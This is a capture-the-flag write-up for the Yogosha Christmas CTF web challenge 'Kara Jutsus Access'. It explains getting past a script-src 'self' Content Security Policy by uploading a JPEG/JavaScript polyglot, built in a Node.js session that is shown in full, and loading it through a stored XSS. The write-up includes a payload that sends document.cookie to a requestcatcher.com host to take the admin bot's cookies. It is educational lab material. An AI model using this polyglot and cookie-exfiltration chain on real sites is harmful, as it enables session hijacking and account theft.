Yogosha Christmas CTF “Kara Jutsus Access” Write up
Challenge name: Kara Jutsus Access
Challenge category: Web
Challenge description: Well done accessing some important information! Now I heard that some kara members use the following website for a reason, can you retrieve Dr Amado cookie ?
Recon
The First thing we get when we open the link is a Blog post and a bunch of comments and we have two other pages (Profil, Report)
And in the profile page, we can just upload an image file (jpg, png, jpeg) and it’s checking the uploaded file by the getimagesize() function in PHP so we must upload a valid image (uncorrupted).
The third part of the website is to report an URL to get viewed by a bot.
XSS with CSP
Now the first thing that comes to mind when we see the comment section and report page is to check for XSS vulnerability so we can test by a simple header to see if there is an XSS
Now we know that there is an XSS with the comment section Next, let’s check if is there any CSP policies by viewing the source code
<meta http-equiv=”Content-Security-Policy” content=” script-src ‘self’ ; object-src ‘none’ ; “>
Let’s check if we can bypass it with the help of CSP Evaluator https://csp-evaluator.withgoogle.com
As we can see if the user can upload files it becomes vulnerable by making the src of the script the file the user uploaded and with that, we can execute javascript code.
Now the big problem is that we just can upload an images file as an avatar but we can solve this by
Polyglot File upload
To make the file and valid image and at the same time contain a javascript code we need to use polyglot file upload vulnerability After a bit of research on what is polyglot and how to inject the image with code I find these useful articles :
For that, I will use this simple jpg image from Wikipedia
And as we saw in the above article let’s start by injecting 2F 2A (/*) between FF E0 and FF DB with ghex
Now let’s inject the rest of the payload as the above articles mentions
┌──(kali㉿kali)-[~/Downloads]
└─$ nodejs
Welcome to Node.js v18.10.0.
Type ".help" for more information.
> var a = fs.readFileSync('JPEG_example.jpg');
undefined
> var b = a.toString('hex');
undefined
> var c = b.substr(0,40);
undefined
> var d = Array(12040).fill("00").join("");
undefined
> var e = `*/=alert(1)/*`.split("").map(function(e){return e.charCodeAt(0).toString(16)}).join("");
undefined
> var f = b.substr(40,b.length);
undefined
> var g = c+d+e+f
undefined
> var h = Buffer.from(g,"hex");
undefined
> var i = fs.writeFile("polyglot.jpg",h,(error) => {if (error) throw err;})
undefinedNow we have a new file with alert(1) payload injected in the final step is to close the second comment in the payload that we opened for that so with ghex navigate to the end of the file and append */ to it
Put it all together
Finally, the new image is ready to be uploaded and the payload is injected into it
And let’s send it to Repeater to make it easier to change the payload
Ok now we have uploaded the file successfully let’s try to trigger it by the XSS script tag in the comment section and making the src of the script the location where the jpg has been stored
<script charset="ISO-8859-1" src="upload/1671984736984412283.jpg"></script>
And we have successfully run javascript code with it.
The last thing we need to retrieve admin cookies by reporting the infected URL to the admin to do that first we need to open a request catcher website for that I will use requestcatcher.com
Now let’s return to the Burpsuite repeater and edit the payload to send cookies to our request catcher by changing the document location to our website and add to it the cookies document.location="https://cbl.requestcatcher.com/test?cookies"+document.cookie
Now let’s test on us before reporting it for that we will repeat the same process when we triggered the alert but we replace the file name with the new one
And it worked so let’s report the URL to the admin to get his cookies
And we have the FLAG in the cookies
FLAG{K4ra_OnCe_Alw4y5_Kara????}
In the end, it was a great challenge by Kahla and merged two things together XSS CSP bypass with polyglot file upload.
25/12/2022
zoznoor23
